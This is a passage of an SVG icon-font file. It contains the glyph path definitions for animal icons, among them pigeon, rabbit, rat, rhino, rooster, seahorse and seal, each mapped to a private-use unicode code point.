5 10 1 15-7 21-10 6-20 14-30 21-71 53-132 118-185 188-4 6-8 15-17 12-8-3-7-13-7-21 0-23 8-44 19-64 18-32 44-59 71-84 4-4 10-8 11-15 2-15 8-27 18-37 3-3 7-9 2-11-12-4-23-15-38-11-27 7-54 10-85 10-19 1-40-2-61-6-24-5-48-12-69-25-4-3-9-6-7-12 1-5 6-6 11-7 9-1 18-2 27-3 114-17 223-53 331-90 7-3 12-7 15-15 5-14 15-23 30-27 6-1 11-4 15-9 19-32 32-37 68-27 6 1 11 3 16 0 15-8 30-4 44 3 5 3 11 5 17 3 35-12 70-9 104 0 59 16 110 43 139 98 15 27 24 55 52 71 9 5 6 13-3 17z m-104-21c-10-1-16 5-16 14-1 11 5 16 15 17 10 0 15-6 16-15 0-10-5-16-15-16z" />
<glyph glyph-name="pigeon-2" horiz-adv-x="1000" unicode="&#xe87e;" d="M908 257c-1 4-3 7-5 10-17 32-42 41-76 27-21-9-39-23-55-39-10-9-19-19-29-28-4 3-4 7-5 11-13 45-29 88-49 130-24 50-51 96-90 135-12 12-22 24-31 38-33 49-41 103-35 161 1 13 2 25 3 40-42-26-78-56-105-96-34-48-47-104-47-163 0-4 0-9-3-13-23-31-24-65-17-101 13-59 43-110 79-157 13-17 28-31 44-47-5-3-9-4-13-4-14-2-28-1-42 2-76 14-145 44-211 83-41 24-78 52-102 94-2 3-4 6-7 8-6 5-12 5-15-4-3-8-4-17-4-27-1-38 4-75 18-112-8 1-15 1-21 1-20 0-29-10-27-29 1-14 6-27 12-39 12-26 28-50 48-71-28-11-33-24-21-50 9-21 24-37 39-55 4-6 8-6 14-1 40 34 86 57 137 68 70 15 137 3 203-24 47-18 94-35 143-43 38-6 74-3 108 15 36 20 67 43 83 83 10 28 16 57 22 86 7 36 28 55 65 58 6 1 12 1 21 2-17 15-23 33-29 51z m-12-24c-4-4-7-4-11 0-4 3-3 7 0 11 3 3 7 3 10 0 4-3 4-7 1-11z m-250 243c35-46 60-97 82-151 7-20 15-40 22-61 2 5 1 9 1 13-6 49-9 99 1 148 10 54 34 100 81 131 15 10 31 16 50 23-32 12-63 19-94 21-71 4-128-20-167-81-4-5-5-9 1-14 8-9 16-19 23-29z" />
<glyph glyph-name="pigeon" horiz-adv-x="1000" unicode="&#xe87f;" d="M134 239c-1-1-3-2-6-3 11 16 22 29 35 41 43 42 96 67 153 84 19 6 38 11 59 16-3-20-2-39 5-57 2-4-3-3-5-4-15-2-30-4-45-7-69-14-134-38-196-70z m233 143c4 1 6 3 7 7 5 16 11 32 17 48 0 2 2 3 0 5-66-16-126-42-165-105 3 0 3 0 4 1 43 22 90 35 137 44z m570 260c0-4-1-5-3-8-5 4-10 8-16 8-6 0-11 1-15-2-9-6-19-8-30-7-8 0-13-4-17-10-10-17-16-35-20-54-6-25-9-49-2-74 1-4 0-4-3-4-4 0-8 2-13 3 7-19 15-37 18-58-8 8-16 16-27 21 5-13 11-24 11-37-7 11-14 22-22 32-34 44-79 73-130 93-9 4-18 7-27 9-7 2-8 4-4 10 10 17 22 33 34 49 17 21 35 42 54 63 6 7 6 7-3 10-1 0-1 1-3 1 8 5 16 9 25 13-6 3-11 1-19 2 28 11 53 24 81 27 5 1 15 1 20 0 1 0 2-1 3-1 15-2 29-6 40-17 1-2 3-2 5-2 31-5 55-18 63-52 0 0 1-11 0-15z m-97 49c1 4-3 5-7 5-3 0-7-1-7-5s4-6 8-6c3 0 6 2 6 6z m-448-306c5 1 11 2 17 2-6-3-12-5-18-6-3-1-6-3-6-6-1-18-1-36 5-54 1-5 4-5 8-5 7 2 15 2 22 3-6-3-13-5-19-6-6-1-6-4-3-9 10-14 25-23 42-28 43-12 86-8 128-1-41 7-78 21-110 49-21 19-36 42-35 72 1 24 12 43 27 62 10 13 22 24 34 35-19-8-38-19-56-31-25-18-33-45-40-73-1-3 0-4 4-4z m57 65c-27-38-27-78 2-112 30-36 110-71 165-53 45 14 90 29 128 58 17 12 30 26 36 46 11 35-2 60-38 70-12 3-25 5-37 6-24 1-46 5-67 18-24 14-30 31-23 56-2 1-4 0-6 0-27-6-53-15-79-25-9-4-19-7-28-12-20-15-38-31-53-52z m3-193c10 1 19 1 29 6-4 0-8 0-11 0-21 1-41 3-60 14-12 6-22 15-26 29-1 5-3 5-7 4-13-3-26-6-39-9-58-13-115-31-167-61-44-26-82-59-106-105-1-1-1-3-2-3v-1c3 1 6 3 8 5 27 18 55 34 84 48 94 45 194 66 297 73z m-13-86c1 6-1 7-6 6-10-1-21-1-31-4-13-3-26-8-37-17-4-4-7-8-4-15 3-5 2-10 1-16-3-13-11-21-21-31 21 2 40 7 57 17 23 13 37 33 41 60z m168-34c6-13 18-21 32-20 2 0 4 0 5 3 4 17 12 22 28 19 5-1 7 1 9 4 18 32 25 68 34 104-12-7-23-10-35-13-19-6-38-10-57-17-13-5-21-13-20-28 0-1-1-3-1-5-1-16-1-32 5-47z m33 412c-11 3-19-2-22-12-4-16 2-30 14-40 19-17 42-23 67-25 21-2 43-3 63-12 14-7 26-17 29-33 4-23-1-45-14-64-18-26-44-41-71-54-64-30-133-43-202-53-43-7-87-12-131-18-69-9-134-30-197-61-34-17-67-36-99-56 0-2 1-2 2-2 33-9 67-9 101-8 3 0 3 2 3 4 1 15 8 27 18 38 5 5 11 10 19 11-7-18-7-36-9-54 0-4 1-6 6-6 22-1 44 2 66 5 3 0 4 2 4 5-2 9-3 18-3 27 0 10 0 21 6 32 6-18 12-34 18-51 2-5 4-6 9-5 9 2 19 3 28 5 3 1 5 2 4 6-2 12 2 22 9 31 7 7 16 12 26 16 17 6 34 7 52 8 9 1 10-1 10-10-2-12-5-24-7-36-2-10-4-20-1-30 3-14 21-18 28-8 2 2 4 4 6 6 8 7 15 7 24 1 3-2 5-5 8-7 9-5 14-4 19 5 4 7 7 15 9 24 10 41 36 70 74 88 25 12 51 17 77 25 73 22 121 66 135 143 2 12 4 25-4 37-44 62-101 106-174 128z m110-498c-1 0-2 1-3 2-4 9-12 11-21 10-9-1-19-1-29 0-21 2-28 12-24 33 2 8 5 17 5 26 0 6-3 10-8 12-6 3-11 2-15-2-5-4-5-9-3-14 4-11 8-23 9-35 0-14-4-22-15-25-8-2-16-3-25 0-11 4-20-1-23-12-1-3-3-3-5-4-5-3-8-7-7-14 6 6 11 9 19 7 14-5 14-5 24 7 2 4 5 8 10 6 5-1 7-5 8-9 2-5-1-8-4-10-5-6-4-13 2-15 9-1 13-6 13-15 6 5 6 11 8 16 6 12 7 11-3 19-3 2-6 4-5 7 1 5 4 6 8 7 4 1 7 0 10-2 6-3 9-7 12-13 3-8 12-14 19-12 6 2 9-2 12-6 2-2 2-6 5-7 1 7 1 14-3 20-2 3-3 6-4 9-1 8-6 13-14 15-7 2-14 2-21 3-1 0-4-1-4 2 0 3 3 3 5 3 15-3 32-1 38-21 2-6 7-9 13-10 5-2 7 3 9 5 8 6 13 5 18-3 0-1 1-2 2-5 3 16 0 20-13 25z m-189-12c-9 1-18-1-25 5-2 2-5 1-8 0l-11-4c-15-6-26 2-25 18 0 3 1 7 2 11 1 7 4 15 4 22 1 7-2 12-8 14-5 3-10 1-15-3-5-4-5-9-3-14 5-12 9-25 9-38-1-12-5-18-17-21-9-3-19-3-28-1-9 2-19 3-27-4-6-6-12-13-17-21-1-3-2-6-1-8 9 10 9 11 22 6 10-3 16-1 21 8 3 5 8 8 13 10 8 2 14 1 18-5 5-6 2-10-2-15-5-6-3-13 4-15 10-2 11-3 11-14h1c6 6 7 14 11 21 4 5-1 10-6 13-3 2-7 5-6 9 2 5 7 7 12 7 1 0 3-1 4-2 7-2 11-8 14-15 4-8 12-13 19-11 6 1 10-2 14-5 2-2 2-5 5-5 1 7-1 12-5 17-2 3-3 5-3 8 0 12-5 17-17 17h-10c-4 0-7 0-10 1-2 1-3 1-3 3 0 2 2 3 3 3 2 0 4 0 6 0 10-1 20-3 29-9 5-3 9-2 11 3 2 5 5 5 9 5 6 0 11 0 18-1-2 8-8 9-13 10z" />
<glyph glyph-name="rabbit" horiz-adv-x="1000" unicode="&#xe880;" d="M343 492c35-4 67-15 94-37 23-18 40-41 52-69 47-115 89-232 133-348 3-10 9-15 19-18 31-6 61-13 92-20 25-7 42-25 43-47 1-9-1-13-11-12-67 10-134 20-201 29-10 2-18 8-24 16-67 82-134 163-200 245-10 12-20 18-35 19-72 6-128 39-164 103-22 38-30 79-23 123 1 8-1 11-9 13-13 3-26 6-39 9-4 1-8 2-7 7 1 19 4 38 24 48 46 26 92 53 140 76 77 36 151 26 218-28 71-57 141-116 211-174 8-7 13-7 19 2 4 8 12 13 21 19-10 7-19 13-28 20-98 70-157 166-191 279-1 4-4 8 0 11 4 3 8-1 12-2 140-50 245-138 307-275 4-9 9-13 18-16 49-16 83-47 95-99 9-37 18-74 28-112 2-7 1-12-6-17 0 0-1 0-1-1-40-34-41-36-93-25-52 11-96 0-136-34-9-8-20-15-29-23-11-10-24-14-38-16-11-2-15 1-19 11-23 60-46 120-69 179-9 23-17 46-26 68-27 67-91 107-163 99-5-1-9-2-14-3z m518-193c12 1 23 12 22 24 0 13-11 23-23 23-13-1-24-12-24-24 1-12 12-23 25-23z m-504-230c-21 4-43 6-64 11-21 5-35 27-36 47 0 9 3 11 11 9 18-3 36-4 54-8 15-2 30-4 44 5 5 3 9 1 12-4 11-12 22-25 33-38 3-3 7-7-1-9-17-5-35-9-53-13z" />
<glyph glyph-name="rat" horiz-adv-x="1000" unicode="&#xe881;" d="M926 307c-5 6-10 12-16 16-67 45-138 53-213 23-12-6-24-13-34-23-15-16-13-35 5-48 2-1 4-3 7-4 33-16 69-20 105-13 21 5 39 13 54 28 10 11 7 25-6 30-24 8-47 6-69-5-6-3-10-6-12-14 19 18 40 17 62 15 6 0 11-2 16-5 6-3 7-7 2-12-5-6-12-11-19-14-30-15-62-15-95-7-13 3-26 6-36 15-10 7-10 14-1 22 9 10 21 15 34 20 60 22 118 14 173-17 11-6 19-13 26-23 7-12 7-21-2-31-7-7-15-12-24-16-22-10-45-15-68-20-59-11-114-2-164 31-15 9-28 20-40 34 9 1 17 0 24 5-14 9-23 20-25 36-1 4-3 8 1 10 3 2 5-2 8-3 2-1 3-2 5-2-5 20-12 40-21 58-9 19-21 36-36 53 5 0 8 0 14 1-29 25-62 36-98 46 5 2 8 4 11 5-2 3-4 3-6 3-36 9-72 8-107-4-3-1-6-3-9-2-4 2 1 6-1 9-28-6-52-21-74-39-2 4 1 6-1 9-12-6-20-14-29-23-13-11-24-24-37-34-6-4-13-9-21-11 0 3 0 6 0 9-1 6-2 13-8 15-6 2-9-4-13-7-9-9-14-19-20-30-2-5-5-4-7 0-1 4-2 7-4 11-1 2-1 5-4 6-2 0-3-3-4-5-4-7-7-14-7-22-1-12-9-17-18-21 0 3 0 6-1 11-3-5-4-9-6-13-2-4-4-4-7-1-3 3-5 6-8 9-1-3-1-5 0-7 1-4 5-8 4-10-2-3-7 0-10-2-1 0-1 0-1-1 9-5 9-5 3-13-10-13-21-26-32-38-3-3-6-7-1-10 7-5 14-8 23-13 0 3-1 4-1 5 0 3-2 6 1 8 1 2 4 1 5 0 3-2 5-5 2-9-2-3 1-3 3-4 3-2 6-1 10 0 23 8 46 6 70 4 3 0 6 0 8-2-5 1-8-1-8-7 0-9-5-14-13-17-12-4-23-7-34-10-3-1-7-1-10-5h14c-4-3-8-3-11-7 5 1 10 1 15 2 4 1 9-2 12-2 8-1 17 2 25 5 5 2 4 10 7 14 3 5 5 11 8 16 2 2 3 4 2 6 12-9 20-22 23-36 2-7 0-11-6-14-6-3-12-7-17-10-1 0-1-1-1-2 2 0 4 2 6 0-4-4-10-6-13-14 7 4 11 9 18 9 0-4-4-6-2-10 4 3 7 8 13 7-1-2-2-3-2-5 14 5 20 14 19 27-1 9 1 11 10 11 7-1 14-2 21 1-7 4-13 8-19 12 22 19 30 41 18 70 2-1 3-2 3-2 1-2 2-4 3-5 8-21 5-40-9-58-1-2-5-3-2-6 9-8 19-13 31-16-1 5-6 7-5 12 8-3 16-7 25-8-1 2-1 3-1 4-3 7-1 8 5 6 6-1 12-1 19 0-5 3-5 5-1 6 12 2 23 8 33 15 7 3 14 9 22 1 3-2 9-3 8-6-1-5-6-4-10-4-10-2-20-3-30-6-4-2-9-3-9-9 5 1 8 5 14 4-2-5-8-6-11-11 7-1 12 3 18 5 1-2-3-5 0-7 3 3 7 5 11 8 2-3 0-6 3-8 6 7 12 14 21 17 6 2 18-2 20-7 2-5-2-10-11-13-4-1-8-2-12-2-7-2-15-2-21-5-4-2-7-4-8-9 5 0 8 5 13 4-4-6-10-7-14-12 7 0 13 4 18 6 3-2-1-5 1-7 4 2 7 5 11 8 3-2 0-6 3-7 5 9 14 14 23 16 11 2 17 7 21 17 5 12 15 19 28 23 8 2 17 3 26 4 11 0 23 1 35 4 5 2 9 1 14-2 52-33 108-58 170-70 45-8 91-3 135 9 25 7 49 15 68 32 22 19 25 46 7 69z m-796 10c-6 6-11 3-18-2 3 8 6 11 12 11 4 0 6-3 6-9z m54 50c-8 3-10 8-8 15 2 10 5 20 11 28-5-14-7-28-3-43z m230 13c-3-9-9-16-14-24-7-10-14-20-19-30-10-22-7-37 12-52 1-1 3-2 4-3-23 4-36 28-27 49 5 11 12 20 19 29 5 6 9 13 13 19 9 15 10 21 3 37 10-7 12-14 9-25z" />
<glyph glyph-name="rhino-head" horiz-adv-x="1000" unicode="&#xe882;" d="M875 293c-131 97-262 194-396 293 6 4 12 7 16 11 27 23 32 54 25 86-5 19-25 12-39 11-34-1-59-16-68-51-2-5-3-10-2-15 4-26-9-29-32-32-40-4-76-20-107-48-34-32-70-63-106-94-61-51-63-52-22-122 151-258 353-325 624-315 41 1 83 9 121 35-27 21-59 20-98 31 39 10 66 15 95 7 24-7 35 3 42 26 22 65 3 135-53 177z m-431 315c17 19 34 38 53 60-3-51-12-60-53-60z m120-309c-26-1-39 10-39 30 0 13 8 33 23 28 19-7 47-13 49-39 0-21-24-16-33-19z m218 109c56 63 88 137 110 227 50-117 55-229 33-351-50 36-96 71-142 105-8 6-7 13-1 19z m-115 91c36 40 56 88 71 145 32-75 34-147 21-224-32 23-62 45-92 67-4 4-4 8 0 12z m-204-467c-10-27-27-34-54-23-157 63-267 174-340 324-10 19-10 35 10 48 15 9 20 8 27-8 72-162 189-278 357-341z m-133-3c-6-18-17-23-35-16-104 40-177 112-226 210-7 13-7 23 6 32 10 6 13 5 18-5 49-106 127-181 237-221z" />
<glyph glyph-name="rhino" horiz-adv-x="1000" unicode="&#xe883;" d="M805 252c-4-3-4-5 0-9 14-11 18-26 15-43-4-18-12-35-21-51-2-5-4-9 3-11 4-1 6-3 9-7 3-4 6-10 4-15-2-4-8-2-12-2-18 0-37 0-55 0-19 0-39 1-59 0-9 0-9 4-5 10 5 10 14 15 26 16 6 0 9 2 11 7 6 15 12 30 17 46 1 5 0 7-4 10-61 36-88 90-88 160 0 53 14 102 46 146 9 13 21 24 34 33 13 9 26 11 41 6 43-13 70-43 87-83 27-64 15-125-23-181-8-11-17-22-26-32z m-291 272c-2 4-5 7-9 10-29 20-60 37-93 51-4 2-7 2-11 0-15-9-29-20-44-31 10-7 18-14 25-22 11-13 16-21 18-28-26 24-56 41-86 58-7 3-10 2-13-4-17-25-33-51-47-78-2-5-2-7 2-11 40-33 64-77 77-127 3-13 5-27 7-41 82 34 125 27 169-26 0 0 1 1 1 1 1 3 2 5 3 8 26 80 22 160 1 240z m-257-278c-10-2-21-4-31-6-27-6-49-20-66-42-3-3-5-6-10-3-6 3-2 7-1 10 4 12 11 24 18 35-21-9-38-24-51-45-54 80-63 167-45 259 5-48 18-94 39-138-2 24-1 48 5 74 5-15 14-26 25-36 4-3 7-3 11 1 28 29 56 60 82 91 5 5 3 7-2 9-12 4-24 6-36 5-4 0-7 0-7 4-1 15-4 29-8 43 3 2 4 0 6 0 76-39 120-100 133-185 2-15 2-31 2-46 0-6-2-10-7-13-18-11-37-14-57-17z m-59 101c-11-5-18-12-24-19-10-10-10-12 4-15 3-1 8-5 9 2 1 11 5 20 11 32z m435-48c-7 22-9 45-7 69 4 60 25 114 64 160 4 6 3 7-2 10-12 6-24 11-36 16-4 1-6 0-9-3-13-13-29-20-46-23-25-5-49-1-75 6 3-7 5-13 6-18 27-82 26-165 1-247-3-8-2-10 6-10 33 1 64 9 93 26 6 4 8 7 5 14z m-174-1c-38 15-75 10-110-12-5-3-6-7-4-13 9-27 22-53 46-70 22-15 21-31 13-52 0-1-1-1-1-2-1-6-4-9-10-9-11-1-20-8-24-18-2-6-1-8 6-8 18 0 37 0 55 0 17 0 34 0 50 0 5 0 11-3 13 2 2 5-2 11-6 16-1 1-3 3-6 4-6 3-6 6-3 12 12 25 20 50 22 78 3 34-12 61-41 72z m195-157c16 19 29 38 40 60 2 5 2 8-2 11-18 15-33 32-44 52-2 4-4 6-8 3-13-7-27-12-41-16-6-1-6-4-4-9 4-11 9-22 16-32 3-4 4-7 2-12-5-17-13-33-22-49-3-6-7-9-15-9-13-1-22-10-25-20-1-5 0-6 5-6 36 0 73 0 109 0 5 0 6 1 5 6-1 10-6 17-16 21z m-304-5c-4 4-3 6 1 8 13 8 23 19 33 32 1 2 4 4 0 8-21 17-37 38-49 65-9-38-25-71-47-100-4-6-9-9-16-9-11-1-20-7-25-17-5-7-4-9 5-9 30 0 60 0 90 0 4 0 11-2 13 3 3 5 0 11-3 16-1 1-2 2-2 3z m579 124c-1 8-5 11-13 11-12 0-19 6-23 18-7 19-14 39-19 60-3-9-4-16-7-23-3-6-2-10 1-15 8-10 15-20 23-30 13-17 28-31 47-46-4 10-7 17-9 25z" />
<glyph glyph-name="rooster" horiz-adv-x="1000" unicode="&#xe884;" d="M930 510c-14 49-44 86-87 113-2 2-4 3-5 5-6 8-11 15-18 22-30 33-67 53-111 58-48 5-91-10-127-41-34-29-55-65-66-107-5-18-8-37-8-56 0-17 0-33-3-50-4-17-9-34-23-46-17-17-39-19-62-16-23 4-43 14-62 28-16 12-29 27-42 43-16 20-33 39-57 51-4 2-8 5-15 6 2-1 2-1 3-2 37-25 36-77-1-102-3-2-3-3-2-6 3-9 4-19 4-30-1-14-5-28-9-42-7-22-4-43 8-63 28-44 92-63 140-40 8 4 16 9 23 14-46-42-96-41-148-11 0 0 0 0 0-1 1 0 1 0 2-1 39-37 86-49 138-36 38 10 66 33 76 74 0 3 2 3 3 5 8 4 14 9 19 15 21 24 19 56-3 77-1 1-2 1-1 3 13-10 23-22 24-39 0-1 1-3 2-4-1-5-2-10-3-15-6-18-18-31-33-41-2-2-4-3-5-6-6-31-25-52-52-67-30-17-64-21-98-15-34 6-64 21-87 49-17 21-24 45-19 72 0 3 1 5 2 8 0 2 1 5 2 7-13-14-28-24-47-28-19-3-37 1-54 12 1-1 1-1 1-2l9-16c18-32 42-57 71-78 20-14 41-28 61-44 1 0 2-1 3-2 1-1 1-1 2-2l2-1c14-12 21-28 23-47 1-15-4-31-11-45-1-3-3-4-7-3-7 2-15 4-22 7-8 2-15 0-21-5 10-6 20-5 31-10-11-2-21 0-31 0-9 0-16-4-21-13 18 3 34 0 51-3-5-2-9-3-13-4-4-2-8-5-10-9-1-2-3-5-1-6 1-2 4-1 6 0 9 4 19 7 29 9 6 2 13 2 18 6 3 4 7 5 11 6l33 8-19 5-2 0c-7 1-10 9-7 16 1 2 2 1 3 0 3-2 6-3 9-2-11 12-10 31 3 42 2-10 12-14 16-23 1-3 3-6 2-9 0-9-1-18-2-28-1-6-2-10-2-13 0-1-1-1-1-2 0 0 0 0 0 0-2-4-6-6-10-5l-14 4c-9 3-17 1-26-4 9-11 23-3 32-9-2-2-4-3-7-3-9-1-18-1-26-2-6-1-12-2-16-7-2-2-5-6-4-8 2-3 6-1 9 0 13 4 27 4 41 3-8-5-16-7-20-15-1-2-3-4-2-6 2-3 5-1 7 0 12 5 24 10 37 15 6 3 13 5 17 11 1 1 2 2 4 2 16-3 30 6 46 5-5 5-9 8-15 9-5 0-10 0-16-1-10-1-13 2-13 12 0 3 0 5 1 8 4-2 7-5 12-2-11 5-12 14-10 23 2 7 0 14 6 19 9 8 12 21 20 30 2 3 1 7 5 10 4 2 7 5 9 10 10 3 19 7 28 13 30 23 58 49 83 77 5 5 9 11 14 17 1-3 1-6 1-9 0-8 0-16 0-24 0-1 0-3 1-3 1-1 2 1 3 1 6 6 10 14 13 23 9 29 2 55-14 80-2 2-4 3-4 5 2 0 3-2 4-3 21-22 28-49 33-77 1-10 2-21 3-33 6 8 10 17 12 26 1 10 2 19 2 29 4-21 3-43 4-65 23 27 26 58 21 90-5 33-21 60-46 83 1 0 2-1 3-1 2-1 4-2 5-4 24-17 37-40 44-67 5-22 6-44 5-66 0-3-1-5 2-8 26 32 28 67 18 104-3 10-7 19-12 28-5 9-12 17-19 25-7 7-15 13-24 18-9 6-18 10-28 12-10 3-20 3-30 4 23 1 45-3 64-16 38-24 57-59 59-104 1-9 5-18 10-27 15 36 3 68-16 99 17-17 28-38 40-60 5 13 5 25 2 36-5 27-19 49-40 66-33 28-71 39-114 29-4-1-8-3-12-4-3-1-7-3-10-5 15 11 33 15 52 16 68 4 121-45 132-96 1-4 3-6 7-9 3 12 2 29-4 43-16 36-43 60-80 72-15 5-30 7-45 7 15 2 29 1 43-2 29-8 53-23 70-48 2-3 5-5 8-7 32-19 56-46 75-77 5-10 11-20 16-30-6 49-16 97-60 129 2 0 2 0 3 0 22-6 42-18 61-32 11-8 22-16 34-22 2-1 4-2 5-1 1 1 0 3-1 5-16 26-36 47-62 62-51 30-105 42-163 38-15-1-29-3-45-6 4 3 8 3 12 4 37 11 75 13 113 5 30-7 58-19 84-35 34-21 64-48 89-79l13-16c1 1 0 2 0 2-9 19-19 37-30 54-19 29-41 55-68 76-27 21-57 35-92 38-6 1-12 0-20 1 33 17 63 18 94 0 21-12 37-29 55-44 5-4 9-8 14-11-15 35-34 67-64 91 1 0 2 0 3-1 23-16 41-36 56-59 10-15 19-31 27-48 2-2 3-4 5-6 0 0 1 1 1 1 0 2 0 3 0 5 0 20-4 39-12 58-9 27-24 50-45 69-28 25-62 31-97 31-35 0-67-11-96-29-9-6-17-12-26-18 0 1 0 1 0 1 8 6 15 13 23 18 40 29 84 45 135 41 32-3 64-12 93-27 4-3 7-6 9-10 21-34 30-72 31-111 1-11 0-23 0-34 12 41 13 81 2 123 30-27 65-86 54-175 1 1 1 2 2 2 14 41 17 82 5 124z m-314 127c40 31 83 35 129 20-45 4-88-2-129-20z m-405-311c24 25 30 55 23 88-1 3-1 5 3 8 20 12 32 39 27 60-4 15-13 27-25 37l-8 6c22-2 41-11 59-25-3 6-4 10-6 15-9 27-24 50-46 69-14 13-28 25-39 40-1 2-3 3-4 3-11 2-21 6-32 11-6 3-13 5-20 6-17 2-30-5-36-18-2-4-2-6 2-8 3-1 4-3 6-6 5-6 8-13 12-21 4-9 10-18 17-25 10-10 22-10 31 1 9 11 12 24 9 37 0 3-2 6-3 10 5-4 7-8 8-14 2-11 1-22-4-32-7-13-17-21-34-15 0-17-5-32-13-45-8-13-17-24-34-25-2 0-2-2-2-4-9-32-13-65-9-99 2-19 8-37 22-52 27-30 69-31 96-2z m-74 279c-7 0-13 5-13 12 0 7 6 12 13 12 7 0 12-5 12-12 0-7-5-12-12-12z m-66 34c-1 5 1 8 5 10 6 1 6 2 3 7-3 4-4 9-3 15 0 2 0 4 2 4 3 1 3-2 4-4 1-4 4-8 8-11 1 0 3-1 5 0 1 1-1 3-1 4-5 9-7 18-4 28 0 1 0 1 1 1 1 2 1 5 4 5 3 0 3-3 3-5 1-5 3-9 5-13 1-2 2-4 4-6 2-2 3-2 4 1 2 9 5 17 11 24 4 4 8 8 13 10 2 0 4 1 5-1 1-1 0-3 0-4-3-5-5-11-6-16-1-7 2-9 8-6 16 6 30 15 39 30 2 3 5 3 7-1 3-7 3-14 0-22-3-9-9-15-19-19 16-2 29 3 43 11 7 5 13 10 19 15 4 3 6 3 7-2 3-11-3-24-13-31-1-1-2-1-5-3 4-1 8-2 11-3 3 0 4-2 4-5-1-7-5-12-11-15-10-5-21-5-32-3-11 3-22 7-32 12-9 4-19 5-29 4-14-2-23-10-26-24-1-3-2-4-5-3-9 1-18 3-24 10-2 1-4 3-5 6z m15-141c-10 8-15 20-15 34 0 20 11 35 24 47 6 6 13 10 20 14 3 2 5 2 6-2 4-7 7-15 12-22 3-5 7-10 11-13 2-2 3-3 2-6-1-19-8-36-22-50-11-12-26-12-38-2z m-20 95c-1 0-2 0-4 0 6 10 15 15 24 20 15 8 24 5 31-11 1-2 0-3-2-5-5-3-10-5-16-3-11 3-22 1-33-1z m79 25c0-5-3-9-8-9-4 0-8 3-8 8 0 4 3 8 8 8 4 0 8-3 8-7z" />
<glyph glyph-name="seahorse" horiz-adv-x="1000" unicode="&#xe885;" d="M732 218c-11 28-28 52-45 75-24 33-23 69 3 100 5 5 6 11 2 17-6 8-12 17-17 26-3 5-6 11 0 15 11 8 7 15 3 23-4 6-8 12-11 18-9 17-6 25 12 32 16 7 18 11 6 25-9 11-8 15 1 25 8 8 8 15-1 23-11 9-22 18-32 27-15 12-18 22-9 39 5 10 2 15-7 19-10 4-20 7-30 10-25 9-29 19-17 42 2 4 5 8 2 12-3 4-8 4-12 3-14-1-27-4-41-3-15 1-26 9-29 23-1 7-1 15-8 18-9 3-14-4-20-9-6-6-11-12-17-18-6-5-12-10-19-14-9-5-17-4-24 4-9 10-13 9-16-3-3-11-5-23-9-34-4-13-9-14-21-9-3 2-7 5-11 1-2-2-1-7 0-11 2-10 7-19 7-30-1-5-1-11-7-12-13-4-11-11-5-19 2-3 4-6 6-8 4-7 4-11-4-15-36-15-42-59-11-83 8-6 5-9 0-14-15-14-32-24-51-30-7-2-13-3-21-1-17 4-26-4-26-22 0-20 7-36 19-51 9-10 19-21 34-18 15 3 17 17 21 29l0 1c4 23 16 41 32 56 16 15 34 25 56 20 30-7 60 0 89-4 13 6 27 11 39 20-10-41 4-80 6-119 1-23 2-46 6-68 5-23 13-43 25-63 21-35 48-66 71-99 13-21 26-42 32-66 3-12 2-23-1-35 3 12 0 27-3 39-7 24-18 41-32 61-23 33-49 63-70 97-12 20-21 41-26 64-5 22-5 47-6 70-2 39-16 72-6 113-12-9-22-8-34-14 17-13 20-31 17-51l-13-77c-6-42-3-83 16-122 16-33 41-59 71-81 21-17 43-31 61-51 10-11 19-22 20-38l1 0-1 0c1-3 2-18-4-31l-1-3c-8-21-19-40-34-56-14-17-32-27-55-23-35 7-59 35-64 75-3 28 15 57 39 64 23 6 56-13 66-37 6-16 2-25-13-32-15-6-20-4-27 14-4 9-9 10-16 4-10-10-13-22-11-35 2-12 10-20 22-23 17-6 32-3 46 8 25 21 32 66 15 94-17 26-43 34-73 33-59-1-102-61-95-115 5-34 26-55 51-74 51-38 117-29 158 18 32 36 49 79 60 125 12 47 9 94-9 139z m-333 317c-6-3-12-5-17-6-20 0-36 14-38 33-2 16 11 34 27 38 5 1 9 1 9-7 0-18 7-33 21-45 7-7 5-10-2-13z m49 3c-33 0-59 26-60 58 0 32 27 59 59 59 33 0 60-27 60-59-1-33-27-58-59-58z m0 86c-18 0-31-14-31-31-1-19 13-33 31-33 18 0 32 14 32 32s-14 32-32 32z m3-30c-7 1-11 6-11 14 0 8 5 11 12 11 8 0 13-5 13-12 0-8-6-13-14-13z m-76-25c-6 0-9-4-9-10 1-5 4-8 9-8 6 0 9 3 10 9-1 5-4 9-10 9z" />
<glyph glyph-name="seal" horiz-adv-x="1000" unicode="&#xe886;" d="M938 58v-3c-3 1-6-1-8-2-16-5-30-13-46-14-18-1-37-2-55 3-14 5-29 6-44 3-15-4-31-6-46-5-26 1-51 7-75 13-3 0-6 2-7 4-6 10-15 10-24 8-5-1-10-1-14-2-4 0-7-1-9-4-6-6-14-10-23-11-18-3-37-2-56-3-46-1-91-2-136-3-7 0-14 0-20 2-12 4-24 8-37 8-2 0-4-1-4 2 0 2 2 2 4 2 6 2 13 4 20 4 25 2 51 3 76 7 32 4 62 13 93 19 4 1 7 2 10 5-4 3-8 4-12 4-55 4-108 10-161 24-28 7-57 15-79 36-3 3-4-1-5-3-5-12-11-24-15-36-5-14-14-20-29-21-43-3-86-8-128-12-15-1-30-4-45-3v4c10 4 19 10 29 15 22 12 43 24 65 36 10 6 17 14 21 26 8 34 18 68 25 102 3 16 0 31-3 47-7 36-16 71-22 107-3 20-8 39-7 60 1 17 7 33 9 49 1 8 2 15 4 22 2 12-2 20-9 28l-40 43c-4 5-7 11-9 18-2 12 4 20 17 18 9-1 18-3 28-3 13 0 26 1 39 5 18 6 36 6 54 0 13-5 27-7 40-15 9-6 16-14 20-24 8-23 16-45 23-69 5-18 16-34 27-50 24-33 46-67 65-103 13-25 32-43 57-54 56-24 104-60 145-104 16-18 33-36 45-57 10-17 18-36 23-55 3-8 3-16 1-25-2-5 0-7 4-9 16-7 33-11 50-14 23-6 46-12 70-16 21-3 43-5 65-2 13 2 26 1 39-2z" />
